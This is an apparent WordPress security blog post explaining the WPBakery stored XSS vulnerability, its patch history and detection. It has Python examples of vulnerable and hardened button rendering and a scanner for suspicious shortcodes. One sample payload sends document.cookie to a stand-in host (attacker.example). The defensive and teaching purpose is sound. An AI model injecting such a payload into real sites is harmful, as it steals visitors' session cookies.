WP Bakery WordPress Plugin Vulnerability Affects Over 4 Million Sites

October 8, 2020

Security analysts found a vulnerability in the WPBakery Page Builder plugin that lets an attacker with a low-privileged account inject malicious JavaScript into pages and posts. The injected script is then served to, and executes in, the browsers of visitors to those pages.

Authenticated Stored Cross-Site Scripting (XSS) Vulnerability

In a cross-site scripting (XSS) vulnerability, an attacker gains the ability to target the browsers of a site's visitors with malicious scripts that were surreptitiously placed on the website.

XSS is among the most common classes of web vulnerability.

This particular issue is an Authenticated Stored Cross-Site Scripting vulnerability. A stored XSS vulnerability is one in which the attacker's script is saved on the site itself (in the database, as part of a post or page) and delivered to every visitor who loads the affected page.

"Authenticated" means that the attacker must hold credentials for the site in order to carry out the attack. As described below, those credentials do not need to be administrative.

WPBakery Authenticated Stored XSS weakness

This particular WPBakery vulnerability requires the attacker to have an account at contributor or author level on the target site, the lowest roles that can create posts.

Once an attacker has such an account, they can inject scripts into their own posts or pages. The flaw also lets the attacker modify posts made by other users.

This vulnerability was made up of several flaws.

Together they allowed the injection of HTML and JavaScript into the credentialed user's own posts and pages and into those of other authors. A further defect concerned buttons that had JavaScript functionality attached to them through a custom onclick handler.

According to Wordfence:

“The plugin also had custom onclick functionality for buttons. This made it possible for an attacker to inject malicious JavaScript in a button that would execute on a click of the button. Furthermore, contributor and author level users were able to use the vc_raw_js, vc_raw_html, and button using custom_onclick shortcodes to add malicious JavaScript to posts.”
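The following Python model, added here as an illustration and not code from WPBakery or Wordfence, shows the pattern behind the button flaw described in the quote: a shortcode attribute (the `custom_onclick` attribute named above; treating it as holding the JavaScript itself is an assumption) copied verbatim into an `onclick` handler, beside a hardened version that only keeps the handler when the author holds WordPress's `unfiltered_html` capability and that attribute-escapes every value. The attribute values are constructed sample data.

```python
import html
from urllib.parse import urlsplit

# Constructed sample: attributes of a button shortcode as a contributor
# might save them. Attribute name from the Wordfence quote; the value is
# made up. Treating custom_onclick as the JavaScript body is an assumption.
PAYLOAD = "fetch('https://attacker.example/?c=' + document.cookie)"
CONTRIBUTOR_ATTS = {
    "title": "Download",
    "link": "https://example.com/report.pdf",
    "custom_onclick": PAYLOAD,
}


def render_button_vulnerable(atts):
    """Vulnerable pattern: values go into the markup verbatim, so script
    stored by anyone who can edit a post runs in every visitor's browser
    when the button is clicked."""
    return '<a href="{link}" class="vc_btn" onclick="{onclick}">{title}</a>'.format(
        link=atts.get("link", ""),
        onclick=atts.get("custom_onclick", ""),
        title=atts.get("title", ""),
    )


def safe_href(url):
    """Allow only http(s) link targets; a javascript: URL is script too."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return url if scheme in ("http", "https") else "#"


def sanitize_button_atts(atts, author_caps):
    """Hardened save-time check: keep custom_onclick only when the saving
    user holds unfiltered_html (administrators and editors on a single-site
    install). Contributors and authors lose the attribute entirely."""
    clean = dict(atts)
    if "unfiltered_html" not in author_caps:
        clean.pop("custom_onclick", None)
    return clean


def render_button_hardened(atts):
    """Every value is attribute-escaped. A retained onclick is escaped as
    well; the browser decodes the entities before running it, so it still
    works for users who are allowed to add it."""
    onclick = atts.get("custom_onclick")
    onclick_attr = ' onclick="%s"' % html.escape(onclick, quote=True) if onclick else ""
    return '<a href="{link}" class="vc_btn"{onclick}>{title}</a>'.format(
        link=html.escape(safe_href(atts.get("link", "")), quote=True),
        onclick=onclick_attr,
        title=html.escape(atts.get("title", ""), quote=True),
    )


def render_for(atts, author_caps):
    """Save-time sanitisation followed by escaped rendering."""
    return render_button_hardened(sanitize_button_atts(atts, author_caps))


if __name__ == "__main__":
    print(render_button_vulnerable(CONTRIBUTOR_ATTS))
    print(render_for(CONTRIBUTOR_ATTS, {"edit_posts"}))
    print(render_for(CONTRIBUTOR_ATTS, {"edit_posts", "unfiltered_html"}))
```

The capability gate belongs at save time, when the plugin knows which user is storing the shortcode; escaping at render time alone cannot tell a contributor's onclick from an administrator's. In a real WordPress plugin the equivalent calls are `current_user_can('unfiltered_html')` and `esc_attr()`.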

WPBakery Page Builder 6.4 and Under Are Affected

The vulnerability was found in late July 2020. WPBakery released a fix in late August, but some of the issues remained, and a second patch issued in early September was also incomplete.

The final fix that closed the vulnerability was released on September 24, 2020, as version 6.4.1.

Plugin developers publish a changelog; its content is what appears in the WordPress admin plugin area to tell site owners what an update contains.

Unfortunately, WPBakery's changelog does not reflect the urgency of the update, because it never says explicitly that it fixes a vulnerability; the security patches are described only as improvements. Site owners who decide whether to update based on the changelog could therefore skip a critical fix.

The WPBakery Page Builder plugin is frequently bundled with themes, so a site may be running it without the owner ever having installed it directly, and bundled copies are typically updated through the theme rather than through WordPress's plugin updater. Publishers should check their installed plugins explicitly and ensure they are on the patched version, 6.4.1 or later.
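Beyond updating, a site owner should look for content that may already have been stored through the flawed shortcodes. The Python script below is an added example (not from WPBakery, Wordfence or this page) that scans rows modelled on the wp_posts table for the `vc_raw_js` and `vc_raw_html` shortcodes and for buttons carrying a `custom_onclick` attribute, and checks an installed version against 6.4.1. The sample rows are constructed; the shortcode and attribute names come from the Wordfence quote, and the encoded bodies are placeholders.

```python
import re
from collections import namedtuple

# Constructed rows modelled on wp_posts: (ID, role of post_author, post_content).
SAMPLE_POSTS = [
    (101, "contributor", 'Welcome [vc_row][vc_column][vc_raw_js]ENCODED_SCRIPT[/vc_raw_js][/vc_column][/vc_row]'),
    (102, "author", '[vc_btn title="Download" link="https://example.com/report.pdf" custom_onclick="alert(document.cookie)"]'),
    (103, "editor", '[vc_raw_html]ENCODED_HTML[/vc_raw_html]'),
    (104, "contributor", '[vc_btn title="Contact" link="https://example.com/contact"]'),
    (105, "author", 'Plain text, no builder markup.'),
]

RAW_SHORTCODES = {"vc_raw_js", "vc_raw_html"}
# Roles that hold unfiltered_html on a single-site WordPress install.
TRUSTED_ROLES = {"administrator", "editor"}

# Opening WPBakery shortcode tags with optional double-quoted attributes.
SHORTCODE_RE = re.compile(r'\[(vc_[a-z_]+)((?:\s+[a-z_]+="[^"]*")*)\s*/?\]', re.I)
ATT_RE = re.compile(r'([a-z_]+)="([^"]*)"', re.I)

Finding = namedtuple("Finding", "post_id author_role shortcode reason severity")


def scan_post(post_id, author_role, content):
    """Flag shortcodes through which script could have been stored."""
    findings = []
    for m in SHORTCODE_RE.finditer(content):
        name = m.group(1).lower()
        atts = {k.lower(): v for k, v in ATT_RE.findall(m.group(2))}
        if name in RAW_SHORTCODES:
            reason = "raw JS/HTML shortcode"
        elif atts.get("custom_onclick"):
            reason = "button with custom_onclick"
        else:
            continue
        # Content saved under a low-privileged author is the direct case.
        # Content under a trusted author still deserves review, because the
        # flaw also let attackers edit other users' posts.
        severity = "high" if author_role not in TRUSTED_ROLES else "review"
        findings.append(Finding(post_id, author_role, name, reason, severity))
    return findings


def scan_all(posts):
    """Scan every (ID, role, content) row and collect the findings in order."""
    return [f for post in posts for f in scan_post(*post)]


def is_affected(version, fixed="6.4.1"):
    """True when an installed WPBakery version predates the fixed release."""
    as_tuple = lambda v: tuple(int(x) for x in v.split("."))
    return as_tuple(version) < as_tuple(fixed)


if __name__ == "__main__":
    for f in scan_all(SAMPLE_POSTS):
        print(f)
    print("6.4 affected:", is_affected("6.4"))
```

On a live site the rows would come from a query such as `SELECT ID, post_author, post_content FROM wp_posts WHERE post_content LIKE '%vc_raw_%' OR post_content LIKE '%custom_onclick%'`, with the author's role looked up from wp_usermeta; `wp db query` is a convenient way to run it. Flagged posts should be reviewed by hand rather than deleted automatically, since legitimate editors may have used the raw shortcodes.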

We at CodeLedge are Sweden's best WordPress development services provider. We are experts at developing creative WordPress websites with effective page load speed. Feel free to talk with us at hi@codeledge.net or get a quote from here.

Citations

Wordfence: Vulnerability Exposes Over 4 Million Sites Using WPBakery

WPBakery Page Builder Changelog (release notes): https://kb.wpbakery.com/docs/preface/release-notes/
